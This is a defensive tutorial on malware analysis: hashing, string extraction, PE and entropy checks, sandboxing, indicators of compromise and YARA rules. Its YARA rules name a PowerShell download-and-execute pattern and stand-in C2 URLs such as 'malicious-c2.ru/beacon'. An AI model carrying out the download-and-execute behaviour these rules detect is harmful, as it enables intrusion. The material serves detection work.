Malware Analysis Basics
Malware analysis is the process of understanding what a malicious program does, how it works, and what indicators it leaves behind. This note covers static and dynamic analysis techniques, sandboxing, hash-based identification, YARA rules, and common indicators of compromise (IOCs).
Analysis Approaches
| Aspect | Static analysis | Dynamic analysis |
|---|---|---|
| Approach | Examine the file without executing it | Execute the sample in a controlled environment and observe behaviour |
| Techniques | File type identification, hash computation, string extraction, disassembly / decompilation | Process monitoring, network traffic capture, registry/file system changes, memory inspection |
| Pros | Safe (no execution) | Reveals actual runtime behaviour |
| Cons | Obfuscation can hide true behaviour | Sandbox evasion; detonation needed |

File Identification
The first step: understand what you’re dealing with before touching it.
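As a rough illustration of checking a header instead of trusting the extension, the sketch below compares the first bytes of a file against the signatures listed in this note. The names `MAGIC_SIGNATURES`, `identify_header`, and `identify_file` are made up for this example, and the signature list is deliberately tiny; the `file` utility knows far more formats.

```python
# Signatures copied from the magic-byte list in this note (offset 0 only).
MAGIC_SIGNATURES = [
    (b"\x7fELF", "Linux ELF binary"),
    (b"MZ", "Windows PE executable"),
    (b"PK", "ZIP archive / Office document"),
    (b"%PDF", "PDF file"),
]


def identify_header(header: bytes) -> str:
    """Return the description of the first signature the header starts with."""
    for magic, description in MAGIC_SIGNATURES:
        if header.startswith(magic):
            return description
    return "unknown"


def identify_file(path: str) -> str:
    """Classify a file by reading only its first 8 bytes; nothing is executed."""
    with open(path, "rb") as handle:
        return identify_header(handle.read(8))


if __name__ == "__main__":
    # A PE header begins with "MZ" regardless of what the extension claims.
    print(identify_header(b"MZ\x90\x00\x03\x00\x00\x00"))
```

Calling `identify_file("suspicious.exe")` on a real sample only opens the file for reading, so it is safe to run on the analysis host.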

    # Identify the file type (don't trust the extension)
    file suspicious.exe
    # Example outputs:
    #   ELF 64-bit LSB executable...
    #   PE32 executable (GUI) Intel 80386...
    #   Zip archive data...

    # Common magic bytes (file headers):
    #   MZ       (4D 5A)        → Windows PE executable
    #   \x7fELF  (7F 45 4C 46)  → Linux ELF binary
    #   PK       (50 4B)        → ZIP / Office documents (docx, xlsx are ZIPs)
    #   %PDF     (25 50 44 46)  → PDF file

    # Check magic bytes manually
    xxd suspicious.exe | head -3
    # or
    hexdump -C suspicious.exe | head -5

Hash Identification
Cryptographic hashes create a fingerprint for a file. Matching that fingerprint against a database of known samples identifies known malware without further analysis.
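The fingerprint-and-lookup idea can be sketched with the standard library alone. In the example below, `hash_stream`, `hash_file`, `lookup`, and the `KNOWN_BAD` dictionary are illustrative names, and the one-entry blocklist (with its "example-family" label) is a stand-in for a real hash database such as VirusTotal.

```python
import hashlib
import io
from typing import BinaryIO, Dict, Optional

# Hypothetical local blocklist; the single entry reuses the example hash from this note.
KNOWN_BAD: Dict[str, str] = {
    "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f": "example-family",
}


def hash_stream(stream: BinaryIO, chunk_size: int = 65536) -> Dict[str, str]:
    """Compute MD5, SHA-1 and SHA-256 in a single pass over the stream."""
    hashers = {name: hashlib.new(name) for name in ("md5", "sha1", "sha256")}
    for chunk in iter(lambda: stream.read(chunk_size), b""):
        for hasher in hashers.values():
            hasher.update(chunk)
    return {name: hasher.hexdigest() for name, hasher in hashers.items()}


def hash_file(path: str) -> Dict[str, str]:
    """Hash a file in chunks so large samples never sit fully in memory."""
    with open(path, "rb") as handle:
        return hash_stream(handle)


def lookup(sha256: str) -> Optional[str]:
    """Return the label for a known-bad SHA-256, or None if it is not listed."""
    return KNOWN_BAD.get(sha256.lower())


if __name__ == "__main__":
    for name, digest in hash_stream(io.BytesIO(b"hello")).items():
        print(f"{name}: {digest}")
```

A miss in `lookup` means only that the hash is not in the list; a single changed byte yields a new hash, so a miss is not evidence that a file is clean.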

    # Compute hashes
    md5sum suspicious.exe      # MD5 - fast; still used for identification (not integrity)
    sha1sum suspicious.exe     # SHA-1
    sha256sum suspicious.exe   # SHA-256 - primary standard for malware IOCs

    # Save hash for reference
    sha256sum suspicious.exe | awk '{print $1}' > sample.hash
    cat sample.hash

    # Look up hash on VirusTotal (CLI)
    pip install vt-py
    export VT_API_KEY="your_api_key_here"

    python3 << 'EOF'
    import os   # required for os.environ below
    import vt

    HASH = "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f"
    with vt.Client(os.environ["VT_API_KEY"]) as client:
        file = client.get_object(f"/files/{HASH}")
        print(f"Name: {file.meaningful_name}")
        print(f"Detection: {file.last_analysis_stats['malicious']}/{sum(file.last_analysis_stats.values())} engines")
        print(f"Family: {file.popular_threat_classification.get('suggested_threat_label', 'unknown')}")
    EOF

    # Or via curl
    curl -s --request GET \
      --url "https://www.virustotal.com/api/v3/files/$(sha256sum suspicious.exe | awk '{print $1}')" \
      --header "x-apikey: $VT_API_KEY" \
      | python3 -m json.tool | grep -E "malicious|type_description"

Static Analysis
String Extraction
Strings embedded in a binary often reveal its intent: URLs, registry keys, file paths, error messages, and commands.
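To show what string extraction does under the hood, here is a minimal sketch that pulls printable ASCII runs and UTF-16LE ("wide") runs out of raw bytes and then filters for URLs. `extract_strings`, `find_urls`, and `URL_RE` are names chosen for this example; the four-character minimum mirrors the default of the `strings` tool.

```python
import re
from typing import List

URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Return printable ASCII runs, then UTF-16LE runs, of at least min_len characters."""
    ascii_runs = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_runs = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [m.group().decode("ascii") for m in ascii_runs.finditer(data)]
    found += [m.group().decode("utf-16-le") for m in wide_runs.finditer(data)]
    return found


def find_urls(strings: List[str]) -> List[str]:
    """Keep only the URL-looking substrings of the extracted strings."""
    return [url for s in strings for url in URL_RE.findall(s)]


if __name__ == "__main__":
    # Synthetic blob: one ASCII URL plus one wide string, separated by junk bytes.
    blob = b"\x00\x01http://example.test/a\x00\xff" + "cmd.exe".encode("utf-16-le")
    strings_found = extract_strings(blob)
    print(strings_found)
    print(find_urls(strings_found))
```

Packed or encrypted samples will yield few meaningful strings with this approach, which is itself a useful signal.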

    # Extract all printable strings from a binary
    strings suspicious.exe

    # Filter for interesting patterns
    strings suspicious.exe | grep -E "https?://"                              # URLs
    strings suspicious.exe | grep -iE "cmd|powershell|exec"                   # command execution
    strings suspicious.exe | grep -iE "password|passwd|cred"                  # credential references
    strings suspicious.exe | grep -E "HKCU|HKLM|Software"                     # Windows registry paths
    strings suspicious.exe | grep -E "\.dll|LoadLibrary"                      # DLL loading
    strings suspicious.exe | grep -E "CreateProcess|ShellExecute|WinExec"     # process creation

    # Unicode strings (wide strings - common in Windows malware)
    strings -el suspicious.exe   # 16-bit little-endian (UTF-16LE)

    # Extract IPs and emails
    strings suspicious.exe | grep -E "[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}"
    strings suspicious.exe | grep -E "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}"

PE File Analysis (Windows)

    # Install pefile (Python library)
    pip install pefile

    python3 << 'EOF'
    import pefile

    pe = pefile.PE("suspicious.exe")

    def section_name(section):
        # Section names are NUL-padded to 8 bytes and are not guaranteed to be valid UTF-8
        return section.Name.decode(errors="replace").rstrip("\x00")

    # Basic info
    print(f"Machine: {hex(pe.FILE_HEADER.Machine)}")      # 0x14c = x86, 0x8664 = x64
    print(f"Timestamp: {pe.FILE_HEADER.TimeDateStamp}")   # seconds since the Unix epoch
    print(f"Sections: {[section_name(s) for s in pe.sections]}")

    # Check for suspicious section characteristics
    for section in pe.sections:
        print(f"Section: {section_name(section)} | Entropy: {section.get_entropy():.2f} | RawSize: {section.SizeOfRawData}")
        # Entropy > 7.0 suggests packed/encrypted content

    # Imported DLLs and functions (reveal capability)
    if hasattr(pe, 'DIRECTORY_ENTRY_IMPORT'):
        for entry in pe.DIRECTORY_ENTRY_IMPORT:
            print(f"  DLL: {entry.dll.decode()}")
            for imp in entry.imports:
                if imp.name:
                    print(f"    {imp.name.decode()}")
    EOF

Suspicious Windows API imports by category:

| Category | Suspicious APIs |
|---|---|
| Process injection | VirtualAllocEx, WriteProcessMemory, CreateRemoteThread |
| Persistence | RegSetValueEx, CreateService, NetScheduleJobAdd |
| Network | InternetOpen, WSAConnect, URLDownloadToFile |
| File system | FindFirstFile, CopyFile, DeleteFile |
| Privilege escalation | AdjustTokenPrivileges, ImpersonateLoggedOnUser |
| Anti-analysis | IsDebuggerPresent, GetTickCount, QueryPerformanceCounter |
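
The table can be applied mechanically to an import list. The sketch below is one possible way to do that: `SUSPICIOUS_APIS` holds a subset of the table, and `base_name` and `categorize_imports` are hypothetical helpers. It assumes the import names were already collected, for example with the pefile loop earlier in this note.

```python
from typing import Dict, Iterable, List, Set

# A subset of the table above; extend it to suit your own triage.
SUSPICIOUS_APIS: Dict[str, Set[str]] = {
    "Process injection": {"VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"},
    "Persistence": {"RegSetValueEx", "CreateService"},
    "Network": {"InternetOpen", "WSAConnect", "URLDownloadToFile"},
    "Privilege escalation": {"AdjustTokenPrivileges", "ImpersonateLoggedOnUser"},
    "Anti-analysis": {"IsDebuggerPresent", "GetTickCount", "QueryPerformanceCounter"},
}


def base_name(api: str) -> str:
    """Drop the ANSI/Unicode suffix, e.g. RegSetValueExA -> RegSetValueEx."""
    known = set().union(*SUSPICIOUS_APIS.values())
    if api not in known and api[-1:] in ("A", "W") and api[:-1] in known:
        return api[:-1]
    return api


def categorize_imports(imports: Iterable[str]) -> Dict[str, List[str]]:
    """Group imported function names by the capability category they suggest."""
    hits: Dict[str, List[str]] = {}
    for api in imports:
        for category, names in SUSPICIOUS_APIS.items():
            if base_name(api) in names:
                hits.setdefault(category, []).append(api)
    return hits


if __name__ == "__main__":
    sample_imports = ["VirtualAllocEx", "WriteProcessMemory", "RegSetValueExA", "printf"]
    for category, apis in categorize_imports(sample_imports).items():
        print(f"{category}: {', '.join(apis)}")
```

A hit is a lead, not a verdict: many legitimate programs import these functions, so what matters is the combination of categories (for example, injection plus network plus anti-analysis).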
Entropy Analysis
Packed or encrypted malware has high entropy (random-looking data, approaching the maximum of 8 bits per byte):

    # Check section entropy (above roughly 7.0 = likely packed/encrypted)
    python3 << 'EOF'
    import math
    import pefile

    def entropy(data):
        """Shannon entropy in bits per byte (0.0 to 8.0)."""
        if not data:
            return 0.0
        counts = {}
        for byte in data:
            counts[byte] = counts.get(byte, 0) + 1
        return -sum((c / len(data)) * math.log2(c / len(data)) for c in counts.values())

    pe = pefile.PE('suspicious.exe')
    for s in pe.sections:
        # Section names are NUL-padded, so strip the padding before printing
        name = s.Name.decode(errors='replace').rstrip('\x00')
        print(f'{name:10} entropy={entropy(s.get_data()):.2f}')
    EOF

Sandboxing (Dynamic Analysis)
A sandbox executes malware in a controlled, isolated environment and records everything it does.
Online Sandboxes

| Service | Type | Notes |
|---|---|---|
| any.run | Interactive | Watch execution in real time; interact with the sample |
| VirusTotal | Automated | Runs 70+ AV engines + some sandbox analysis |
| Joe Sandbox | Automated | Detailed Windows/Linux/macOS analysis |
| Hybrid Analysis | Automated | Free; Falcon Intelligence sandbox |
| Triage (tria.ge) | Automated | Fast; API access; YARA matching |

    # Submit a sample via VirusTotal API (the file is sent as multipart form data)
    curl -s --request POST \
      --url "https://www.virustotal.com/api/v3/files" \
      --header "x-apikey: $VT_API_KEY" \
      --form "file=@suspicious.exe" \
      | python3 -m json.tool | grep -E '"id"|"type"'

    # Get analysis results after a minute
    ANALYSIS_ID="<id from above>"
    curl -s --request GET \
      --url "https://www.virustotal.com/api/v3/analyses/$ANALYSIS_ID" \
      --header "x-apikey: $VT_API_KEY" \
      | python3 -m json.tool | grep -E "status|malicious|harmless"

Local Sandbox - Cuckoo

    # Cuckoo Sandbox - self-hosted dynamic analysis platform
    # (Runs malware in a VM; intercepts system calls and network traffic)

    # Installation overview (simplified; Cuckoo 2.x requires Python 2.7)
    pip install cuckoo
    cuckoo init
    cuckoo community        # download rules and signatures

    # Configure a Windows 7 analysis VM in VirtualBox
    # (Cuckoo agent must be installed in the VM)

    # Submit a sample
    cuckoo submit suspicious.exe
    cuckoo submit --timeout 120 suspicious.exe   # run for 2 minutes

    # View results in web UI
    cuckoo web runserver

    # What Cuckoo captures:
    #   Process tree (parent-child relationships)
    #   System call trace (file, registry, network, process operations)
    #   Network traffic (PCAP)
    #   Screenshots (periodic)
    #   Memory dumps
    #   Extracted network IOCs (domains, IPs, URLs contacted)

Common Malware Indicators (IOCs)
IOCs are artifacts that signal a system has been compromised.
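Since IOCs arrive as a mix of hashes, addresses, domains, and registry keys, a first triage step is often just sorting them by type. The sketch below is a simplified, assumption-laden classifier: `classify_indicator` and its `host:` / `network:` labels are invented for this example, and the domain check is loose enough that a file name such as `evil.dll` would be labelled a domain.

```python
import ipaddress
import re

HASH_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256"}
DOMAIN_RE = re.compile(r"(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,}")


def classify_indicator(value: str) -> str:
    """Label an indicator string as a host-based or network-based IOC type."""
    value = value.strip()
    # Hex strings of a digest length are treated as file hashes.
    if re.fullmatch(r"[0-9a-fA-F]+", value) and len(value) in HASH_LENGTHS:
        return f"host:file-hash-{HASH_LENGTHS[len(value)]}"
    try:
        ipaddress.ip_address(value)  # accepts IPv4 and IPv6
        return "network:ip"
    except ValueError:
        pass
    if re.match(r"https?://", value, re.IGNORECASE):
        return "network:url"
    if value.upper().startswith(("HKLM\\", "HKCU\\")):
        return "host:registry-key"
    if DOMAIN_RE.fullmatch(value):
        return "network:domain"
    return "unknown"


if __name__ == "__main__":
    for ioc in ["203.0.113.7", "c2.example.net", "HKCU\\Software\\Run"]:
        print(f"{ioc} -> {classify_indicator(ioc)}")
```

Sorting indicators this way makes it easier to route them: host-based ones to EDR or file scanning, network-based ones to firewall, proxy, or DNS logs.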
Host-Based IOCs

    # 1. Unknown processes
    ps auxf        # shows process tree (parent-child)
    pstree -p      # tree view with PIDs
    ls -l /proc/[0-9]*/exe 2>/dev/null | grep '(deleted)'   # running binaries that were deleted from disk

    # 2. Suspicious network connections (beaconing / C2 traffic)
    ss -tulpan     # all connections with processes
    netstat -tulpan | grep ESTABLISHED | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -rn
    # High frequency connections to same IP = possible beacon

    # 3. Suspicious files in common locations
    find /tmp /var/tmp /dev/shm -type f -executable 2>/dev/null
    find /tmp \( -name "*.sh" -o -name "*.py" -o -name "*.pl" \) 2>/dev/null
    find / -name ".*" -type f -newer /etc/passwd 2>/dev/null | head -20   # hidden files newer than passwd

    # 4. Recently modified files in system directories
    find /etc /usr/bin /usr/sbin -type f -mtime -7 2>/dev/null   # modified in the last 7 days

    # 5. Persistence mechanisms
    # Crontabs
    crontab -l 2>/dev/null
    for user in $(cut -f1 -d: /etc/passwd); do crontab -u "$user" -l 2>/dev/null; done
    cat /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/* 2>/dev/null

    # Systemd units added by malware (review the list for unfamiliar names)
    systemctl list-units --type=service --state=running
    find /etc/systemd /usr/lib/systemd ~/.config/systemd -name "*.service" -exec ls -la {} + 2>/dev/null

    # Linux LD_PRELOAD injection (library hijack)
    cat /etc/ld.so.preload 2>/dev/null   # should be empty or not exist

    # 6. Unusual user accounts
    awk -F: '$3 == 0 && $1 != "root" { print "ROOT UID: "$1 }' /etc/passwd
    awk -F: '$NF !~ /nologin|false/ && $3 >= 1000 { print $1 }' /etc/passwd
    lastlog | grep -v "Never logged in" | tail -20

Network-Based IOCs

    # Capture traffic in the network namespace of a suspicious process
    PID=$(pgrep -o suspicious)     # -o: oldest matching process, so PID holds a single value
    nsenter -t "$PID" -n tcpdump -i any -w "/tmp/suspect-$PID.pcap" &

    # Look for beaconing patterns in a PCAP (count packets per destination IP)
    tcpdump -r capture.pcap -nn 'tcp' | awk '{print $5}' | cut -d. -f1-4 | sort | uniq -c | sort -rn | head

    # DNS queries (potential C2 domain generation algorithms - DGA)
    # The queried name is the second-to-last field; the last field is the packet length
    tcpdump -r capture.pcap -nn 'udp dst port 53' | grep -v "ptr\|PTR\|SOA" | awk '{print $(NF-1)}' | sort | uniq -c | sort -rn

    # tshark - extract all contacted IPs
    tshark -r capture.pcap -T fields -e ip.dst -q | sort | uniq -c | sort -rn | head -20

    # Look for long DNS names (possible DNS tunneling or DGA)
    tshark -r capture.pcap -T fields -e dns.qry.name -q \
      | awk 'length($0) > 30' | sort | uniq -c | sort -rn

YARA Rules
YARA is a pattern-matching language for malware identification. Each rule describes strings or byte patterns, combined with logical conditions.
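To make the "strings plus condition" model concrete, the pure-Python sketch below imitates a rule whose condition is "3 of them", using the same five case-insensitive strings as the PowerShellDownloader rule in this section. It is not YARA and does not use the YARA engine; `RULE_STRINGS`, `matched_strings`, and `n_of_them` are illustrative names, and real rules support hex patterns, regexes, and modifiers that this toy ignores.

```python
from typing import Dict, List

# String identifiers and values borrowed from the PowerShellDownloader rule.
RULE_STRINGS: Dict[str, bytes] = {
    "$ps1": b"powershell",
    "$dl1": b"DownloadString",
    "$dl2": b"Invoke-Expression",
    "$web": b"WebClient",
    "$enc": b"FromBase64String",
}


def matched_strings(data: bytes, strings: Dict[str, bytes]) -> List[str]:
    """Return the identifiers whose pattern occurs in data, ignoring case."""
    haystack = data.lower()
    return [name for name, pattern in strings.items() if pattern.lower() in haystack]


def n_of_them(data: bytes, strings: Dict[str, bytes], threshold: int) -> bool:
    """Emulate a 'N of them' condition: at least threshold distinct strings match."""
    return len(matched_strings(data, strings)) >= threshold


if __name__ == "__main__":
    sample = b"PowerShell -c (New-Object Net.WebClient).DownloadString('http://c2.example.net/a')"
    print(matched_strings(sample, RULE_STRINGS))
    print(n_of_them(sample, RULE_STRINGS, 3))
```

The point of a threshold condition is that no single string is damning on its own; it is the co-occurrence of several that makes the match meaningful.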

    /* Basic YARA rule structure */
    rule ExampleMalware {
        meta:
            description = "Detects Example malware C2 URLs"
            author = "[email protected]"
            date = "2025-03-11"
            reference = "https://threatintel.example.com/report/123"
            hash = "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f"

        strings:
            $url1 = "malicious-c2.ru/beacon" ascii
            $url2 = "evil-domain.cn/upload" ascii wide   // wide = UTF-16LE match
            $mutex = "Global\\MutexName123" ascii
            $pdb_path = "C:\\Users\\attacker\\malware.pdb" ascii

            // Hex byte pattern (x86: xor eax,eax; push eax; push imm32 - a typical shellcode prologue)
            $shellcode = { 31 C0 50 68 }

            // Regex pattern
            $ip_regex = /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/ ascii

        condition:
            uint16(0) == 0x5A4D and         // PE magic bytes "MZ"
            filesize < 2MB and
            any of ($url*) and              // any URL string matches
            $mutex and
            ($shellcode or $ip_regex) and   // every declared string must be referenced, or YARA rejects the rule
            not $pdb_path                   // exclude known samples
    }

    # Install YARA
    apt install yara

    # Write a rule and test it
    cat > detect_poshell.yar << 'EOF'
    rule PowerShellDownloader {
        strings:
            $ps1 = "powershell" nocase
            $dl1 = "DownloadString" nocase
            $dl2 = "Invoke-Expression" nocase
            $web = "WebClient" nocase
            $enc = "FromBase64String" nocase

        condition:
            3 of them
    }
    EOF

    # Scan a file
    yara detect_poshell.yar suspicious.exe

    # Scan a directory recursively
    yara -r detect_poshell.yar /tmp/samples/

    # Scan memory of a running process (pass the PID as the target; -p sets the thread count)
    yara detect_poshell.yar 1234

    # Use community rules (from Awesome-YARA, ESET, Mandiant, etc.)
    # Clone signature sets
    git clone https://github.com/Neo23x0/signature-base.git

    # Scan with multiple rule files
    yara signature-base/yara/mal_*.yar /tmp/suspicious.exe

Analysis Workflow Summary

    1. SAFE ENVIRONMENT
       → Work in an isolated VM with no network access to production
       → Snapshot the VM before analysis; restore after
       → Use REMnux (remnux.org) - purpose-built Linux distro for analysis

    2. IDENTIFY
       → Compute SHA-256 hash → check VirusTotal
       → file command, xxd for magic bytes
       → Check file entropy (packed = ~7.0+)

    3. STATIC ANALYSIS
       → strings → filter for IPs, URLs, registry keys, commands
       → PE imports → identify capability categories
       → Disassemble: Ghidra (free) or IDA Pro (commercial)

    4. DYNAMIC ANALYSIS
       → Submit to any.run or Hybrid Analysis
       → Or run in local Cuckoo sandbox
       → Capture: process tree, file/registry changes, network traffic

    5. IOC EXTRACTION
       → Extract: file hashes, C2 IPs/domains, mutex names, registry keys
       → Encode as STIX objects; share over TAXII
       → Write YARA rules for detection

    6. REPORTING
       → Document: malware family, capabilities, C2 infrastructure
       → Load IOCs into your SIEM for blocking and alerting
       → Update EDR detection rules and blocklists
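
For the IOC extraction step, the sketch below shows how extracted values might be rendered as STIX 2.1 pattern strings. It produces only the pattern text, not complete STIX Indicator objects (those also need an id, timestamps, and other required properties). `PATTERN_TEMPLATES` and `stix_pattern` are names invented for this example.

```python
from typing import Dict

# STIX 2.1 comparison-expression templates for a few common observable types.
PATTERN_TEMPLATES: Dict[str, str] = {
    "sha256": "[file:hashes.'SHA-256' = '{value}']",
    "ipv4": "[ipv4-addr:value = '{value}']",
    "domain": "[domain-name:value = '{value}']",
    "url": "[url:value = '{value}']",
    "mutex": "[mutex:name = '{value}']",
}


def stix_pattern(ioc_type: str, value: str) -> str:
    """Render one IOC as a STIX pattern string, escaping backslashes and quotes."""
    escaped = value.replace("\\", "\\\\").replace("'", "\\'")
    return PATTERN_TEMPLATES[ioc_type].format(value=escaped)


if __name__ == "__main__":
    extracted = [
        ("sha256", "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f"),
        ("ipv4", "203.0.113.7"),
        ("mutex", "Global\\MutexName123"),
    ]
    for ioc_type, value in extracted:
        print(stix_pattern(ioc_type, value))
```

In practice a maintained STIX library would build and validate the full objects; the sketch only illustrates how each IOC type maps to a pattern.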